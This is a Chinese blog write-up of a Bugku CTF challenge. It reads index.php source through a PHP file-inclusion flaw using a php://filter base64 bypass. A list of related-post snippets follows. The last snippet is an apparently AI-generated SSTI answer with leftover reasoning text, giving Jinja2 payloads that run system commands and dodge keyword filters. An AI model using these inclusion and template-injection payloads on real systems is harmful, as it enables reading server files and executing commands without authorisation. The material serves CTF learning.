bugku_web flag在index里

最新推荐文章于 2024-08-04 21:17:36 发布
最新推荐文章于 2024-08-04 21:17:36 发布
阅读量635 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: bugku wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/didid_w/article/details/80161071

打开网页:

点击之后url变成了:


看到?file=show.php在结合题目 flag在index里 很容易想到文件包含

试试:http://120.24.86.145:8005/post/index.php?file=file_get_contents(index.php)


在试了其他的文件读取函数发现什么都没输出,说明可能有过滤条件得绕过过滤

通过php伪协议利用PHP://filter/read=convert.base64-encode/resource=xxx将文件的base64加密后读取出来,达到绕过过滤的目的

http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php



得到一段base64加密后的数据:

PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==

解密后得到flag










flagindex,php://filter协议
wssmiss的博客
03-06 786
题目连接http://123.206.87.240:8005/post/ 题目 点击之后出现 地址栏:http://123.206.87.240:8005/post/index.php?file=show.php 观察此题的切入点应该在文件包含漏洞,而且是php ...
CTF/CTF练习平台-flagindex【php://filter的利用】
benli8541的博客
02-08 2464
原题内容: http://120.24.86.145:8005/post/ Mark一下这道题,前前后后弄了两个多小时,翻了一下别的博主的wp感觉还是讲的太粗了,这总结下自己的理解: 首先打开这道题,页面只给你click me? no 点击进去显示test5 第一步,查看源代码,无果 第二步bp,无果 结合到题目,flagindex,大胆尝试http://120.24.86.145:8005/post/index.php,可惜和之前一样 注意到了传值为http://1...
bugku-web-flagindex
a3uRa的一个窝
08-22 413
最近好忙啊 不说了,开始题目吧 进入页面 click me?no 点击 发现url变成了 http://120.24.86.145:8005/post/index.php?file=show.php flagindex面 尝试?file=index.php 不行没有任何返回 尝试 ?file=php://filter/convert.base64-encode...
Bugku——flagindex
王嘟嘟的博客
11-03 1103
0x00 前言 今日份CTF奉上,这到底涉及到的伪协议是真的不懂呀。 题目 0x01 start 我一直都相信就算有什么东西不会,但是请把你能做好的每一点都做好,比如说xxxx这个东西你根本不会,你首先要做的就是把xxxx这个名字的意思查清楚,虽然很蠢,但是也是一中态度。 点开链接进行查看 点一下click me进行尝试。 发现这很明显的提示file=xxxx 知道是文件包含,但是怎么利用...
Bugku web——flagindex
qq_40481505的博客
09-04 411
打开题目链接,点击“click me”,发现其连接为: http://123.206.87.240:8005/post/index.php?file=show.php 说明index.php使用了文件包含,因此可以利用php文件包含漏洞 此漏洞有下面几种利用方法 php://filter 使用方法:http://123.206.87.240:8005/post/index.php?file=p...
Bugku Web CTF-flagIndex
No Title
12-09 1033
Bugku Web CTF-flagIndex 查看网页源码。 <html> <title>Bugku-ctf</title> <a href="./index.php?file=show.php">click me? no</a></html> 观察URL的格式,让人联想到文件包含漏洞。然而并没有看到...
bugku_noteasytrick
weixin_50076644的博客
07-29 837
bugku_web_noteasytrick
BugkuCTF web 输入密码查看flag——never give up
the_world_go的博客
04-06 1082
输入密码查看flag 看到要输入密码(爆破爆破爆破)。 打开bp抓包。爆破(果然弱密码) 输入密码得到 flag{bugku-baopo-hah} 点击一百万次好像网页崩了(也有可能我太菜了),进不去。。。 备份是个好习惯 打开网页,一段乱码。好的我看不懂,看源码没线索,抓包,没发现 拿御剑扫下后台吧 找到了 可以看到我要提交key1和key2,他们不相等但是md5处理以后相等 参考php漏洞...
[Bugku] web-CTF靶场系列系列详解④!!!
muyuchen110的博客
08-04 708
平台为“山东安信安全技术有限公司”自研CTF/AWD一体化平台,部分赛题采用动态FLAG形式,避免直接抄袭答案。
CTF|BugkuCTF-WEB解题思路
这里是一处长期不更新的博客
06-15 2222
截止至练习题【login4】,仅提供解题思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这是使用is_numeric遇到%00截断的漏洞,这构造 http://120.24.86.145:8002.
webflag-开源
04-26
webflag是一个基于Web的软件,可以帮助您找到魔兽世界中的其他角色扮演者。 webflag使flagRSP附加组件系列中的字符描述在网络上可用。 您可以根据课程和级别范围搜索RP播放器
BugKu flagindex-知识点
布屿
05-17 393
CTF/CTF练习平台-flagindex【php://filter的利用】 https://blog.youkuaiyun.com/wy_97/article/details/77431111 谈一谈php://filter的妙用 https://blog.youkuaiyun.com/wy_97/article/details/77432002 ...
bugku---flagindex
LuckySec
11-15 499
题目 http://123.206.87.240:8005/post/ 点击试试 可以看到file=show.php 由此想到php://filter是PHP中独有的协议 这是关于php://filter的博客 https://www.leavesongs.com/PENETRATION/php-filter-magic.html 将网址改为 http://123.206.87.240:80...
Bugkuweb flagindex
qq_26961571的博客
06-23 990
这道题本来以为是简单抓包题,没想到是文件包含题目,让我打开了新世界大门。 老规矩,先打开他要求的网页查看。 查看源代码。 并没有什么东西。 点击了之后也是出现一行字。 源代码也没有任何东西。 这时候想到抓包,看了老半天的包,面也是啥都没发现。只能百度了 百度说这是文件包含漏洞,给了一串url命令,主要是让file=index的意思,这岂不是完全依赖于题目提示了,看来题目还是非常关键的东西。 http://123.206...
bugku web flagindex
thinszx的博客
03-09 307
题目描述 看到了点击以后的url,尝试了一下?file=index.php,结果失败,啥都没有,上网搜了一下题解,发现这是php中的伪协议 php伪协议 在php中,有
BugkuCTFWeb--flagindex
VZZmieshenquan的博客
02-08 344
Description: http://123.206.87.240:8005/post/ Solution: 进入网页点击链接以后查看网址发现有可以读取本地php的参数题目说明flagindex,所以我就直接把show改成了php,但是发现网页内容为空,所以就用php://filter伪协议来读取本地php文件 将网址改成 http://123.206.87.240:8005/pos...
bugku flagindex
Seaern的博客
07-02 351
题目链接 第二个界面发现url为: http://123.206.87.240:8005/post/index.php?file=show.php 参数有file选项,联想到了文件包含漏洞 结合题目提示: flagindex 通过PHP内置协议直接读取代码 PHP内置协议 通过构造如下语句: http://xxx.com/index.php?file=php://fil...
bugku flagindex
YenKoc的博客
10-20 234
先点进去看看。 看到file,似乎在暗示着我们,php://filter/read/convert.base64-encode/resource=index.php, 这句将index.php内容用base64编码形式显示出来。 自己将结果解码,得出flag。 ...
Bugkuflagindex
foreverzwl
10-22 1804
php文件包含漏洞
bugku web Simple_SSTI_2
最新发布
03-27
<think>嗯,用户需要关于Bugku平台上Web题目Simple_SSTI_2的解决方案或详细信息。首先,我得回忆一下SSTI(服务器端模板注入)的基本概念。SSTI通常发生在使用模板引擎渲染用户输入时,如果未正确过滤输入,攻击者可以注入恶意代码。常见的模板引擎有Jinja2(Python)、Twig(PHP)、FreeMarker(Java)等。 题目是Simple_SSTI_2,可能比第一题稍难。可能需要绕过一些过滤器或黑名单。比如,某些关键字如"class"、"subclasses"可能被过滤,或者某些特殊字符被转义。用户可能需要找到替代的方法来访问对象的方法或属性。 首先,确定使用的模板引擎类型。例如,Bugku的题目可能基于Python的Flask框架,使用Jinja2模板。在Jinja2中,常用的Payload比如{{config}}或者通过对象继承链来执行命令。比如,通过访问''.__class__.__mro__[1].__subclasses__()来获取子类,寻找可利用的类如subprocess.Popen。 但是题目可能有过滤,比如过滤了下划线或某些关键字。这时候需要绕过,比如使用request.args或request.values来传递参数,或者使用字符串拼接、十六进制编码等方式。例如,将__class__拆分为'_'+'_class'+'_'+'_',或者使用其他属性访问方式如attr()方法。 另外,可能需要绕过对特定函数的限制,比如os模块被禁用,可以考虑使用其他模块如subprocess来执行命令。或者利用内置函数如__import__来动态导入模块。 假设题目中存在黑名单过滤了"class"、"subclasses"等关键字,那么可能需要寻找替代方法。例如,使用原生Python的魔术方法或属性,或者使用过滤器如|attr()来拼接字符串。例如,{{''|attr('__class__')}}来获取类对象。 另外,如果题目中存在对某些字符的过滤,比如双下划线被过滤,可以使用request对象中的参数来传递。例如,构造Payload为{{''[request.args.a][request.args.b][request.args.c]()}},然后通过URL参数传递a=__class__,b=__base__等。 还需要考虑如何执行系统命令。例如,找到subprocess.Popen类,然后调用它执行命令。可能需要遍历子类来找到可用的类。例如,在Jinja2中,可以通过{{''.__class__.__mro__[1].__subclasses__()}}来获取所有子类,然后找到索引对应的Popen类。 如果题目中有沙箱环境,可能需要更复杂的绕过方式,比如利用Python的内省机制或全局变量。例如,使用__globals__或__builtins__来访问需要的函数。 总结步骤可能为:确定模板引擎类型→探测过滤规则→构造Payload绕过过滤→访问对象继承链→找到可利用的类→执行命令获取flag。 可能需要参考类似题目的解法,比如通过{{config}}查看配置信息,或者通过{{''.__class__.__base__.__subclasses__()[X].__init__.__globals__}}来访问模块的全局变量,进而导入os模块执行命令。 最后,验证Payload的有效性,并确保在题目环境中正确执行。可能需要多次尝试不同的索引或方法,直到找到正确的子类索引。</think>### Bugku Web题目 Simple_SSTI_2 解决方案 #### 1. 漏洞背景 Simple_SSTI_2考察**服务器端模板注入(SSTI)**漏洞,常见于未严格过滤用户输入的模板引擎(如Jinja2)。攻击者通过注入恶意代码可执行任意命令或读取敏感数据[^1]。 #### 2. 基本分析步骤 1. **确定模板引擎类型** 输入`{{7*7}}`,若返回`49`则为Jinja2/Twig类引擎;若返回`7777777`则可能为其他引擎(如Mako)。 2. **探测过滤规则** 尝试基础Payload如`{{''.__class__}}`,若返回错误或空白,说明可能过滤了关键字(如`_`、`class`)。 例如题目可能过滤下划线,需改用其他方式(如`request.args`传参或字符串拼接)。 #### 3. 绕过过滤的Payload示例 假设题目过滤了`_`和`class`,可通过以下方式绕过: ```python {{ ''|attr(request.args.a) }}&a=__class__ ``` 或使用十六进制编码: ```python {{ ""|attr("\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f") }} ``` #### 4. 利用对象继承链执行命令 1. **获取基类** ```python {{ ''.__class__.__mro__[1] }} # 输出:<class 'object'> ``` 2. **遍历子类寻找可利用类** ```python {{ ''.__class__.__mro__[1].__subclasses__()[400] }} # 假设索引400为subprocess.Popen ``` 3. **执行系统命令** ```python {{ ''.__class__.__mro__[1].__subclasses__()[400]('ls', shell=True, stdout=-1).communicate() }} ``` #### 5. 获取Flag的典型Payload 若题目限制严格,可通过`__globals__`访问内置模块: ```python {{ config.__class__.__init__.__globals__['os'].popen('cat /flag').read() }} ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值